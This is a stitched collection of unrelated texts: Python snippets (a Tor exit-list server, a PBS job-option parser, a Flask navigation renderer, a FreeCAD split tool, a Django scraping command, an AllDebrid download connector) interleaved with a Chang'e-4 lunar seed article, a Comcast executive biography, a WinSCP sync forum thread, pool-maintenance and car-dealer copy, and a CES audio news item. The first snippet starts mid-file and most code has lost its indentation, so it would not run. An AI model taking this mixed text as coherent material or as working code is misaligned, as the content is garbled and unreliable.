        # honor the last hop of X-Forwarded-For when behind a proxy
        header = request.received_headers.get("X-Forwarded-For", None)
        if header is not None:
            host = header.split(',')[-1].strip()
response = {"IP": host}
addHeader(request)
return json.dumps(response, indent=4)
class Ser(Exitaddr):
def __init__(self, *args, **kwargs):
Exitaddr.__init__(self, *args, **kwargs)
self.fld = 0
def passed(self, result):
pass
def failed(self, result):
print result[0].id_hex[1:], "failed"
self.fld += 1
def finished(self, results):
global exitaddr_results
res = {}
for key in results.keys():
res[key] = results[key][1]
exitaddr_results = res
print ""
print "failed", self.fld
print "exit list ready!"
def main():
root = resource.Resource()
root.putChild("exits", Exits())
root.putChild("ip", IP())
reactor.listenTCP(DEFAULT_PORT, server.Site(root))
# sample a few for now
options.num_exits = 25
exitaddr = Ser(reactor, options)
print "listening on", DEFAULT_PORT
exitaddr.start()
if __name__ == "__main__":
main()
|
their Q2 2011 Bay Area Venture Deal Terms report.
VC Experts' coverage of that report can be found at Q2 2011 Bay Area Venture Deal Terms.
The report found consistencies in terms across both areas, as well as some differences.
#!/usr/bin/env python
'''class for parsing PBS options'''
from argparse import ArgumentParser
import os, re, validate_email
from vsc.event_logger import EventLogger
from vsc.utils import walltime2seconds, size2bytes
from vsc.utils import InvalidWalltimeError
class PbsOptionParser(EventLogger):
'''Parser for PBS options, either command line or directives'''
def __init__(self, config, event_defs, job):
'''constructor'''
super(PbsOptionParser, self).__init__(event_defs, 'global')
self._config = config
self._job = job
self._arg_parser = ArgumentParser()
self._arg_parser.add_argument('-A')
self._arg_parser.add_argument('-e')
self._arg_parser.add_argument('-j')
self._arg_parser.add_argument('-k')
self._arg_parser.add_argument('-l', action='append')
self._arg_parser.add_argument('-m')
self._arg_parser.add_argument('-M')
self._arg_parser.add_argument('-N')
self._arg_parser.add_argument('-o')
self._arg_parser.add_argument('-q')
def parse_args(self, option_line):
'''parse options string'''
self._events = []
args = option_line.split()
options, rest = self._arg_parser.parse_known_args(args)
for option, value in options.__dict__.items():
if value:
self.handle_option(option, value)
if self._job.queue and not self._job._is_time_limit_set:
walltime_limit = self.get_queue_limit(self._job.queue)
if walltime_limit:
self._job._resource_specs['walltime'] = walltime_limit
def handle_option(self, option, value):
'''option dispatch method'''
if option == 'A':
self.check_A(value.strip())
elif option == 'e' or option == 'o':
self.check_oe(value.strip(), option)
elif option == 'j':
self.check_j(value.strip())
elif option == 'k':
self.check_k(value.strip())
elif option == 'l':
self.check_l(value)
elif option == 'm':
self.check_m(value.strip())
elif option == 'M':
self.check_M(value.strip())
elif option == 'N':
self.check_N(value.strip())
elif option == 'q':
self.check_q(value.strip())
def check_A(self, val):
'''check whether a valid project name was specified'''
if re.match(r'[A-Za-z]\w*$', val):
self._job.project = val
else:
self.reg_event('invalid_project_name', {'val': val})
def get_queue_limit(self, queue_name):
'''get the maximum walltime for the queue specified'''
for queue_def in self._config['queue_definitions']:
if queue_def['name'] == queue_name:
return int(queue_def['walltime_limit'])
return None
def check_q(self, val):
'''check whether a valid queue name was specified'''
if re.match(r'[A-Za-z]\w*$', val):
self._job.queue = val
else:
self.reg_event('invalid_queue_name', {'val': val})
def check_j(self, val):
'''check -j option, vals can be oe, eo, n'''
if val == 'oe' or val == 'eo' or val == 'n':
self._job.join = val
else:
self.reg_event('invalid_join', {'val': val})
def check_k(self, val):
'''check -k option, val can be e, o, oe, eo, or n'''
if re.match(r'^[eo]+$', val) or val == 'n':
self._job.keep = val
else:
self.reg_event('invalid_keep', {'val': val})
def check_m(self, val):
'''check -m option, val can be any combination of b, e, a, or n'''
if re.match(r'^[bea]+$', val) or val == 'n':
self._job.mail_events = val
else:
self.reg_event('invalid_mail_event', {'val': val})
def check_M(self, val):
'''check -M option'''
self._job.mail_addresses = val.split(',')
uid = os.getlogin()
for address in self._job.mail_addresses:
if (not validate_email.validate_email(address) and
address != uid):
self.reg_event('invalid_mail_address', {'address': address})
def check_N(self, val):
'''check -N is a valid job name'''
if re.match(r'[A-Za-z]\w{,14}$', val):
self._job.name = val
else:
self.reg_event('invalid_job_name', {'val': val})
def check_time_res(self, val, resource_spec):
'''check a time resource'''
attr_name, attr_value = val.split('=')
try:
seconds = walltime2seconds(attr_value)
resource_spec[attr_name] = seconds
except InvalidWalltimeError:
self.reg_event('invalid_{0}_format'.format(attr_name),
{'time': attr_value})
def check_generic_res(self, val, resource_spec):
'''check a generic resource'''
attr_name, attr_value = val.split('=')
if attr_name == 'feature':
resource_spec[attr_name] = attr_value.split(':')
else:
resource_spec[attr_name] = attr_value
def check_mem_res(self, val, resource_spec):
'''check memory resource'''
attr_name, attr_value = val.split('=')
match = re.match(r'(\d+)([kmgt])?[bw]', attr_value)
if match:
amount = int(match.group(1))
order = match.group(2)
resource_spec[attr_name] = size2bytes(amount, order)
else:
self.reg_event('invalid_{0}_format'.format(attr_name),
{'size': attr_value})
def check_nodes_res(self, val, resource_spec):
'''check nodes resource'''
_, attr_value = val.split('=', 1)
# if present, multiple node specifications are separated by '+'
node_spec_strs = attr_value.split('+')
node_specs = []
for node_spec_str in node_spec_strs:
node_spec = {'features': []}
spec_strs = node_spec_str.split(':')
# if a node spec starts with a number, that's the number of nodes,
# otherwise it can be a hostname or a feature, but number of nodes is 1
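            # e.g. a hypothetical 'nodes=2:ppn=4:gpus=1+gpu_node:ppn=36' yields
            #   {'nodes': 2, 'ppn': 4, 'gpus': 1, 'features': []} and
            #   {'nodes': 1, 'host': 'gpu_node', 'ppn': 36, 'features': []}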
if spec_strs[0].isdigit():
node_spec['nodes'] = int(spec_strs[0])
else:
node_spec['nodes'] = 1
# note that this might be wrong, it may actually be a feature, but
# that is a semantic check, not syntax
node_spec['host'] = spec_strs[0]
# now deal with the remaining specifications, ppn, gpus and features
for spec_str in spec_strs[1:]:
if (spec_str.startswith('ppn=') or
spec_str.startswith('gpus=')):
key, value = spec_str.split('=')
if value.isdigit():
node_spec[key] = int(value)
else:
self.reg_event('{0}_no_number'.format(key),
{'number': value})
else:
node_spec['features'].append(spec_str)
node_specs.append(node_spec)
resource_spec['nodes'] = node_specs
def check_procs_res(self, val, resource_spec):
'''check procs resource specification'''
attr_name, attr_value = val.split('=')
if attr_name in resource_spec:
self.reg_event('multiple_procs_specs')
if not attr_value.isdigit():
self.reg_event('non_integer_procs', {'procs': attr_value})
resource_spec[attr_name] = int(attr_value)
def check_l(self, vals):
'''check and handle resource options'''
resource_spec = {}
has_default_pmem = True
# there can be multiple -l options on one line or on the command line
for val_str in (x.strip() for x in vals):
# values can be combined by using ','
for val in (x.strip() for x in val_str.split(',')):
if (val.startswith('walltime=') or
val.startswith('cput=') or
val.startswith('pcput=')):
self.check_time_res(val, resource_spec)
self._job._is_time_limit_set = True
elif (val.startswith('mem=') or val.startswith('pmem=') or
val.startswith('vmem=') or val.startswith('pvmem=')):
self.check_mem_res(val, resource_spec)
if val.startswith('pmem='):
has_default_pmem = False
elif val.startswith('nodes='):
self.check_nodes_res(val, resource_spec)
elif val.startswith('procs='):
self.check_procs_res(val, resource_spec)
elif (val.startswith('partition=') or
val.startswith('feature') or
val.startswith('qos')):
self.check_generic_res(val, resource_spec)
else:
self.reg_event('unknown_resource_spec', {'spec': val})
self._job.add_resource_specs(resource_spec)
self._job._has_default_pmem = has_default_pmem
def check_oe(self, val, option):
'''check for valid -o or -e paths'''
if ':' in val:
host, path = val.split(':', 1)
else:
host = None
path = val
if option == 'e':
self._job.set_error(path, host)
else:
self._job.set_output(path, host)
|
China has taken one of the biggest steps in space exploration. Cotton seeds brought to the Moon aboard China’s Chang’e-4 mission have sprouted, marking the first time plants have grown on the lunar surface.
The craft and its tiny garden touched down on the Moon on January 3. To set things straight from the top, Chang’e-4 isn’t growing seeds in the lunar surface material itself – that is, in the regolith – or in temperatures that veer between much colder and much hotter than anything found on Earth.
Instead, the craft is tending to cotton seeds buried in earthly soil, brought along in the container. The jar also contains potato, Arabidopsis and rapeseed seeds, plus a few fruit fly eggs and yeast – all loaded by researchers from Chongqing University.
The ability to grow plants on the Moon would represent an extremely useful resource for long term space missions, like a trip to Mars which would take about two-and-a-half years.
Can you really grow food on the Moon?
Researchers did perform many experiments on Earth though, growing seeds in a simulated lunar environment, as well as on the International Space Station – where algae and fungi survived about 500 days in space.
The first seeds flowering in space were on a Soviet craft Salyut 7 in 1982.
An even bigger cause for worry is radiation: the Moon receives far more particle radiation than the ISS, which is shielded by our planet’s magnetosphere. The sealed container shields the plants inside, at least to a degree, but the conditions are much harsher.
The Moon also has extreme temperature swings – between day and night, and between areas that are exposed to the sun or covered by shade – with variations of 200-300 degrees Celsius in a single day. The container has a mechanism to transfer heat which should make it possible to maintain a temperature of about 20-30 degrees Celsius. According to Afshin Khan, an environmental scientist at the Blue Marble Space Institute of Science in Seattle, the heat control system is dependent on some kind of radioisotopic heat source, but the details are not clear.
Why isn’t it possible to grow plants on another planet?
Of course, growing fruits and vegetables requires the right amounts of oxygen, carbon dioxide, humidity, light and temperature control, and gravity — all of which can be extremely difficult to control in space.
Another problem is soil: it’s necessary for plant growth, but it also takes up precious space, and plants won’t readily grow in the soil on the Moon or Mars. That’s why NASA is currently exploring techniques that use very little soil.
import json
from hashlib import sha1
from flask_nav import Nav
from flask_nav.elements import Navbar, View, Subgroup, Link, Text
from flask_bootstrap.nav import BootstrapRenderer
from flask import session, url_for
from dominate import tags
class LinkTab(Link):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class LogIn(View):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class SeparatorAlign(Text):
def __init__(self):
super().__init__("")
class Navigation:
with open("configs/base.json", "r") as base_config_file:
base_config = json.load(base_config_file)
base = ['TiT', View('Home', 'home'), View('Account', "account.home")]
services = [View('JF Service', "jf.home"), View('Buyback Service', 'buyback.home'),
View('Fittings', "fittings.home"), View("Market Service", "ordering.home")]
settings = [SeparatorAlign(), View("Bug Report", 'issues'), View("Change Theme", "settings"),
View('Log Out', 'auth.log_out')]
alliance = base + services
corp = base + [Subgroup("Corporation", View('Corp Main', "corp.home"),
LinkTab("Corp Forums", base_config["forum_url"])),
Subgroup("Services", *services)]
def __init__(self, app):
nav = Nav()
# noinspection PyUnusedLocal,PyAbstractClass,PyMethodMayBeStatic,PyPep8Naming
@nav.renderer('custom')
class CustomRenderer(BootstrapRenderer):
# External links now open in new tab
def visit_LinkTab(self, node):
item = tags.li()
item.add(tags.a(node.text, href=node.get_url(), target="_blank"))
return item
def visit_LogIn(self, node):
item = tags.li()
inner = item.add(tags.a(href=node.get_url(), _class="nav-image"))
inner.add(tags.img(src=url_for("static", filename="sso_login.png")))
if node.active:
item['class'] = 'active'
return item
            def visit_SeparatorAlign(self, node):
                # alignment markers are consumed in visit_Navbar below,
                # so this visitor should never be reached
                raise NotImplementedError
def visit_Navbar(self, node):
# create a navbar id that is somewhat fixed, but do not leak any
# information about memory contents to the outside
node_id = self.id or sha1(str(id(node)).encode()).hexdigest()
root = tags.nav() if self.html5 else tags.div(role='navigation')
root['class'] = 'navbar navbar-default'
cont = root.add(tags.div(_class='container-fluid'))
# collapse button
header = cont.add(tags.div(_class='navbar-header'))
btn = header.add(tags.button())
btn['type'] = 'button'
btn['class'] = 'navbar-toggle collapsed'
btn['data-toggle'] = 'collapse'
btn['data-target'] = '#' + node_id
btn['aria-expanded'] = 'false'
btn['aria-controls'] = 'navbar'
btn.add(tags.span('Toggle navigation', _class='sr-only'))
btn.add(tags.span(_class='icon-bar'))
btn.add(tags.span(_class='icon-bar'))
btn.add(tags.span(_class='icon-bar'))
# title may also have a 'get_url()' method, in which case we render
# a brand-link
if node.title is not None:
if hasattr(node.title, 'get_url'):
header.add(tags.a(node.title.text, _class='navbar-brand',
href=node.title.get_url()))
else:
header.add(tags.span(node.title, _class='navbar-brand'))
bar = cont.add(tags.div(
_class='navbar-collapse collapse',
id=node_id,
))
bar_list = bar.add(tags.ul(_class='nav navbar-nav'))
bar_list_right = bar.add(tags.ul(_class='nav navbar-nav navbar-right'))
to_right = False
for item in node.items:
if isinstance(item, SeparatorAlign):
to_right = True
continue
if not to_right:
bar_list.add(self.visit(item))
else:
bar_list_right.add(self.visit(item))
return root
@nav.navigation('anon')
def nav_anon():
return Navbar('TiT', View('Home', 'home'),
View('Buyback Service', 'buyback.home'), View('JF Service', "jf.home"),
View('Recruitment', 'recruitment.home'),
SeparatorAlign(), View("Change Theme", "settings"), LogIn('Log In', 'auth.sso_redirect'))
@nav.navigation('neut')
def nav_neut():
return Navbar('TiT', View('Home', 'home'), View('Account', "account.home"),
View('Buyback Service', 'buyback.home'), View('JF Service', "jf.home"),
View('Recruitment', 'recruitment.home'),
SeparatorAlign(), View("Change Theme", "settings"), View('Log Out', 'auth.log_out'))
@nav.navigation('corporation')
def nav_corp():
items = Navigation.corp + Navigation.settings
return Navbar(*items)
@nav.navigation('alliance')
def nav_alliance():
items = Navigation.alliance + Navigation.settings
return Navbar(*items)
@nav.navigation('admin')
def nav_admin():
admin_elements = []
role_elements = []
market_service = False
security = False
for role in session.get("UI_Roles"):
if role == "jf_admin":
admin_elements += [View('JF Routes', "jf.admin"), View('JF Stats', "jf.stats")]
elif role == "user_admin":
admin_elements.append(View('User Roles', "admin.roles"))
elif role == "jf_pilot":
role_elements.append(View('JF Service', "jf.pilot"))
elif role == "buyback_admin":
admin_elements.append(View('Buyback Service', 'buyback.admin'))
elif role in ["ordering_marketeer", "ordering_admin"] and not market_service:
role_elements.append(View('Market Service', 'ordering.admin'))
market_service = True
elif role in ["security_officer", "recruiter"] and not security:
role_elements.append(View('Recruitment Apps', 'recruitment.applications'))
if role == "security_officer":
role_elements.append(View('Security Info', 'security.home'))
admin_elements.append(View('Recruitment Settings', 'recruitment.admin'))
security = True
elif role == "recruiter" and not security:
role_elements.append(View('Recruitment Apps', 'recruitment.applications'))
subs = []
if role_elements:
subs.append(Subgroup('Role Pages', *role_elements))
if admin_elements:
subs.append(Subgroup('Admin Pages', *admin_elements))
if session["UI_Corporation"]:
items = Navigation.corp + subs + Navigation.settings
elif session["UI_Alliance"]:
items = Navigation.alliance + subs + Navigation.settings
else:
return nav_neut()
return Navbar(*items)
nav.init_app(app)
|
Ebonne L. Ruffins became Vice President of Local Media Development (LMD) at Comcast in March of 2016. Her team’s mission is to provide Comcast with a local business advantage through technologies and programming that reach customers down to the neighborhood level. Ebonne leads the company-wide strategy, creative vision, and technical execution of LMD’s broad portfolio of assets, which include: public, educational, and governmental (PEG) programming; Project Open Voice; EveryBlock digital platform and map app; Stringwire live streaming app; Comcast Newsmakers national and regional news platform; and the award-winning commemorative programming initiative, Voices of the Civil Rights Movement.
Before taking the helm of Comcast’s LMD team, Ebonne led diversity media communications for Comcast Corporation, overseeing national diversity advertising; print, radio, and online collateral communications; national surveys; and executive multimedia consulting. During her four-year tenure on the Corporate Diversity & Inclusion team, Ebonne developed Comcast’s first-ever mandatory employee diversity training module; launched Comcast NBCUniversal’s public diversity report and digital platform; and produced Comcast’s first-ever Diversity Summit in December of 2015.
Prior to joining Comcast in 2011, Ebonne was an English and Spanish producer for the internationally acclaimed television series, CNN Heroes. At CNN, Ebonne produced award-winning multilingual stories on “ordinary people with an extraordinary impact” in 19 cities across five continents.
Ebonne began her career as an on-air reporter for WCAX TV, a CBS affiliate in Burlington, Vermont. She was also a reporter/producer for NPR in Washington, D.C., and a CNN Fellow and contributor for CNN’s Washington, D.C. Bureau. She also served as a co-producer for the award-winning intergenerational documentary, Life’s Essentials with Ruby Dee, released in 2014.
Currently, Ebonne is an Executive Board member and National Board member of the National Association for Multi-Ethnicity in Communications (NAMIC). Since 1999, Ebonne has served as co-founder and volunteer for the Mother-Daughter Senior Decorating Service, LLC, a residential decorating service for senior citizens and people with disabilities at the University of Pennsylvania Center for Rehabilitation and Care (PCRC).
Ebonne is a graduate of Northwestern University School of Law and the Medill Graduate School of Journalism. She is also a proud alumna of Spelman College. |
# ***************************************************************************
# * (c) 2009, 2010 Yorik van Havre <[email protected]> *
# * (c) 2009, 2010 Ken Cline <[email protected]> *
# * (c) 2020 Eliud Cabrera Castillo <[email protected]> *
# * *
# * This file is part of the FreeCAD CAx development system. *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * FreeCAD is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with FreeCAD; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides GUI tools to split line and wire objects."""
## @package gui_split
# \ingroup draftguitools
# \brief Provides GUI tools to split line and wire objects.
## \addtogroup draftguitools
# @{
from PySide.QtCore import QT_TRANSLATE_NOOP
import FreeCAD as App
import FreeCADGui as Gui
import Draft_rc
import DraftVecUtils
import draftguitools.gui_base_original as gui_base_original
import draftguitools.gui_tool_utils as gui_tool_utils
from draftutils.messages import _msg
from draftutils.translate import translate
# The module is used to prevent complaints from code checkers (flake8)
True if Draft_rc.__name__ else False
class Split(gui_base_original.Modifier):
"""Gui Command for the Split tool."""
def GetResources(self):
"""Set icon, menu and tooltip."""
return {'Pixmap': 'Draft_Split',
'Accel': "S, P",
'MenuText': QT_TRANSLATE_NOOP("Draft_Split", "Split"),
'ToolTip': QT_TRANSLATE_NOOP("Draft_Split", "Splits the selected line or polyline into two independent lines\nor polylines by clicking anywhere along the original object.\nIt works best when choosing a point on a straight segment and not a corner vertex.")}
def Activated(self):
"""Execute when the command is called."""
super(Split, self).Activated(name=translate("draft","Split"))
if not self.ui:
return
_msg(translate("draft", "Click anywhere on a line to split it."))
self.call = self.view.addEventCallback("SoEvent", self.action)
def action(self, arg):
"""Handle the 3D scene events.
This is installed as an EventCallback in the Inventor view.
Parameters
----------
arg: dict
Dictionary with strings that indicates the type of event received
from the 3D view.
"""
if arg["Type"] == "SoKeyboardEvent":
if arg["Key"] == "ESCAPE":
self.finish()
elif arg["Type"] == "SoLocation2Event":
gui_tool_utils.getPoint(self, arg)
gui_tool_utils.redraw3DView()
elif (arg["Type"] == "SoMouseButtonEvent"
and arg["Button"] == "BUTTON1"
and arg["State"] == "DOWN"):
self.point, ctrlPoint, info = gui_tool_utils.getPoint(self, arg)
if "Edge" in info["Component"]:
return self.proceed(info)
def proceed(self, info):
"""Proceed with execution of the command after click on an edge."""
wire = App.ActiveDocument.getObject(info["Object"])
edge_index = int(info["Component"][4:])
Gui.addModule("Draft")
_cmd = "Draft.split"
_cmd += "("
_cmd += "FreeCAD.ActiveDocument." + wire.Name + ", "
_cmd += DraftVecUtils.toString(self.point) + ", "
_cmd += str(edge_index)
_cmd += ")"
_cmd_list = ["s = " + _cmd,
"FreeCAD.ActiveDocument.recompute()"]
self.commit(translate("draft", "Split line"),
_cmd_list)
self.finish()
Gui.addCommand('Draft_Split', Split())
## @}
|
Any pointers on what the script should look like to do that? Is it possible?
What is a root folder of the synchronization?
What about files in other (sub)folders (if there are any)? What about files in the synchronization root folder?
Sorry about being vague; I was trying to keep it general so that other users in the same boat could benefit as well.
Within each of the monthly folders there are various files; there are 4 file names that get repeated with different file extensions (ATM01.*, ATM02.*, ATM03.* and ATM04.*). There could be other file names in there that I don't want (e.g. ATM08.*), but I don't know for sure what they will be, so I only want to include the files that start with the 4 names given, with any file extension after that name (e.g. ATM01.txt, ATM01.csv, etc.).
On the local machine the file path is H:\sftp\file\ and it should replicate the monthly folder structure.
So I want to synchronize from the Remote (FTP) server to the local machine based on the rules given above.
Is that enough information for you?
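For reference, here is a sketch of the kind of script this calls for. The session URL, host key and remote path are placeholders to adjust, and the same commands can also go in a plain WinSCP script file rather than being driven from Python:

import subprocess

# Placeholders: adjust the session URL, host key and remote path.
WINSCP = r"C:\Program Files (x86)\WinSCP\winscp.com"
commands = [
    'open sftp://user:password@ftp.example.com/ -hostkey="ssh-rsa 2048 xx:xx:..."',
    # the trailing "*/" keeps the monthly subfolders in scope while the
    # name patterns restrict which files inside them are transferred
    'synchronize local "H:\\sftp\\file" "/remote/path"'
    ' -filemask="ATM01.*; ATM02.*; ATM03.*; ATM04.*; */"',
    'exit',
]
# winscp.com accepts each console command as a separate argument after /command
subprocess.run([WINSCP, "/command"] + commands, check=True)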
Thanks Martin that worked great! |
#-*- coding: utf-8 -*-
import os
import shutil
from django.core.management.base import BaseCommand, CommandError
# CURRENT_DIR = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
# BACKEND_DIR = os.path.abspath(os.path.join(CURRENT_DIR, os.pardir))
# APP_DIR = os.path.abspath(os.path.join(BACKEND_DIR, os.pardir))
# WEBAPPS_DIR = os.path.abspath(os.path.join(APP_DIR, os.pardir))
# For production:
CURRENT_DIR = '/home/tooski/webapps/python_core/python_core/rankings/'
BACKEND_DIR = '/home/tooski/webapps/python_core/python_core/'
APP_DIR = '/home/tooski/webapps/python_core/'
WEBAPPS_DIR = '/home/tooski/webapps/'
# For dev:
# CURRENT_DIR = '/home/seba-1511/Dropbox/Dev/tooski/python_core/rankings/'
# BACKEND_DIR = '/home/seba-1511/Dropbox/Dev/tooski/python_core/'
# APP_DIR = '/home/seba-1511/Dropbox/Dev/tooski/'
# WEBAPPS_DIR = '/home/seba-1511/Dropbox/Dev/tooski/'
class Command(BaseCommand):
args = 'None'
help = 'Updates the table to the latest races, directly scrapped from the FIS website.'
def handle(self, *args, **options):
os.system('rm ' + WEBAPPS_DIR + 'website/ranking.json')
os.system('rm ' + CURRENT_DIR + 'fis/ranking.json')
# We get the leaderboard rankings and move them to the Apache server:
os.system('cd ' + CURRENT_DIR +
'/fis/ && scrapy crawl ranking -o ranking.json -t json')
# Testing:
shutil.copy(CURRENT_DIR + 'fis/ranking.json',
WEBAPPS_DIR + 'website/ranking.json')
# Server
# shutil.copy(CURRENT_DIR + '/fis/ranking.json',
# WEBAPPS_DIR + '/website/ranking.json')
# We should use the pipeline system of scrapy with the races.
os.system('cd ' + CURRENT_DIR + '/fis/ && scrapy crawl races')
|
The Testing hours of operation for the Macon Cove, Union Avenue, and Millington locations are shown below. College business offices are not open on weekends. Please consult the Calendars, News, and Videos page for additional information related to holidays, closings, and other events.
Please visit Schedule a Test/Exam and select the appropriate heading to see the available schedule.
*Note: When classes are not in session, Macon Cove Testing is open from 8 a.m. to 4:30 p.m., Monday through Friday.
Defense Activity for Non-Traditional Education Support (DANTES) and College Level Examination Program (CLEP) are administered quarterly at the Millington Center. Please visit Schedule a Test/Exam and select the appropriate heading to see the available schedule.
This is not a full service testing facility. The hours are Tuesday and Thursday from 10 a.m.-2 p.m. Please visit Schedule a Test/Exam and select the appropriate heading to see the available schedule. |
"""
Copyright (c) 2013, SMART Technologies ULC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Copyright holder (SMART Technologies ULC) nor
the names of its contributors (Joshua Henn) may be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER (SMART Technologies
ULC) "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from core.lib.robotremoteserver import RobotRemoteServer
import bootstrap
from entities import *
import os
import sys
import subprocess
import platform
from log import Logger
class Selenium:
vmrunPath = None
log = Logger()
def __init__(self):
"""Also this doc should be in shown in library doc."""
def start(self):
        # launch the standalone Selenium server and keep a handle to the process
        self.process = subprocess.Popen(
            ['java', '-jar', 'java/selenium-server-standalone-2.21.0.jar'],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if __name__ == '__main__':
#RobotRemoteServer(Selenium(), *sys.argv[1:])
s = Selenium()
s.start() |
We manage commercial facilities by providing supervision, training, service, certified pool operators, and chemicals and supplies. Commercial services can include facility evaluations, safety inspections for pool, development and implementation of operational and maintenance procedures, employee manuals, emergency plans and intensive training programs.
CPO® Certified Service – Hire us as your CPO® Certified technicians for weekly, biweekly or monthly* visits.
Pool Inspections – We can perform a detailed swimming pool inspection to let you know how your pool conforms to code and standards.
Aquatic Supervision Plans – A plan developed specifically for your pool outlining your facilities procedures and pool information.
Pool Staff Training – Training includes state requirements for pools, testing and adjusting chemicals, safety issues and other pool basics.
Pool Maintenance Service – We can visit your pool 1, 2 or 3 times a week and maintain it.
Emergency Visits – If something goes wrong at your pool, call us and we’ll come and fix it for you. Clients receive a 24 hour response time.
Leak Detection and Pressure Testing – Think you have leak, let one of our specially trained technicians help you.
Service Work – Pipework, tiling, chlorinator install and more. You need service work done at your pool, we can do it.
Swimming Pool Expert Witness – We provide swimming pool experts for legal cases including diving accidents, drowning accidents, chemical accidents, improper installation, etc.
* Monthly visits require a valid CPO® on your staff. ** Delivery option available only in select portions of New Jersey.
*** Travel fees will apply. |
# Generated by Django 2.2.4 on 2019-09-26 05:47
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [("account", "0033_serviceaccount")]
operations = [
migrations.CreateModel(
name="Webhook",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("target_url", models.URLField(max_length=255)),
("is_active", models.BooleanField(default=True)),
("secret_key", models.CharField(blank=True, max_length=255, null=True)),
(
"service_account",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="webhooks",
to="account.ServiceAccount",
),
),
],
options={"permissions": (("manage_webhooks", "Manage webhooks"),)},
),
migrations.CreateModel(
name="WebhookEvent",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"event_type",
models.CharField(
db_index=True, max_length=128, verbose_name="Event type"
),
),
(
"webhook",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="events",
to="webhook.Webhook",
),
),
],
),
]
|
Marshall MINI has locations across England and is dedicated to providing the ultimate customer service for drivers looking to purchase a new or used MINI, and those who already own their dream small car.
Our expert team can talk you through the entire range of vehicles, from the classic MINI Hatch to the exciting Countryman SUV. We also carry a number of Approved Used MINI models, including pre-owned, nearly new and ex-demonstrator models. The team can ask questions about your requirements and budget, then help you build your perfect car, with competitive finance available to make your purchase even more affordable.
If you would like to access a new MINI vehicle through the Motability Scheme, or require a fleet of vehicles for business purposes, our team can help.
At all of our locations, affordable aftersales care is performed by our team of trained experts. Whether your MINI requires its scheduled service, annual MOT or repairs following an accident or scrape, we can help.
Contact your nearest outlet today. We have sales and aftersales dealerships in Grimsby, Bournemouth, Salisbury and Hook (Hampshire), as well as a dedicated aftersales outlet in Scunthorpe. |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Connector for AllDebrid
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
# ------------------------------------------------------------
from core import jsontools
from core import logger
from core import scrapertools
# Returns a list of possible video URLs for the given page_url
def get_video_url(page_url, premium=False, user="", password="", video_password=""):
logger.info("(page_url='%s' , user='%s' , password='%s', video_password=%s)" % (
page_url, user, "**************************"[0:len(password)], video_password))
page_url = correct_url(page_url)
url = 'http://www.alldebrid.com/service.php?pseudo=%s&password=%s&link=%s&nb=0&json=true&pw=' % (
user, password, page_url)
data = jsontools.load_json(scrapertools.downloadpage(url))
video_urls = []
if data and data["link"] and not data["error"]:
extension = ".%s [alldebrid]" % data["filename"].rsplit(".", 1)[1]
video_urls.append([extension, data["link"]])
else:
try:
server_error = "Alldebrid: " + data["error"].decode("utf-8", "ignore")
server_error = server_error.replace("This link isn't available on the hoster website.",
"Enlace no disponible en el servidor de descarga") \
.replace("Hoster unsupported or under maintenance.",
"Servidor no soportado o en mantenimiento")
except:
server_error = "Alldebrid: Error en el usuario/password o en la web"
video_urls.append([server_error, ''])
return video_urls
def correct_url(url):
if "userporn.com" in url:
url = url.replace("/e/", "/video/")
if "putlocker" in url:
url = url.replace("/embed/", "/file/")
return url
|
Theta Digital showcases latest high performance AV components | What Hi-Fi?
Californian manufacturer showcases latest high-performance AV components at the International Consumer Electronics Show (CES) 2014.
Californian company Theta Digital has showcased its latest high-performance AV components at the International Consumer Electronics Show (CES) 2014.
MORE: Stars of CES 2014 – the winners revealed!
The new components include the Casablanca IV Music and Cinema Controller – the latest version of the company's preamplifier/processor.
Advanced features of the new Casablanca model include Dirac Live 96K digital room correction, a 192kHz post-processing board and Theta's Jitter Jail II anti-jitter technology.
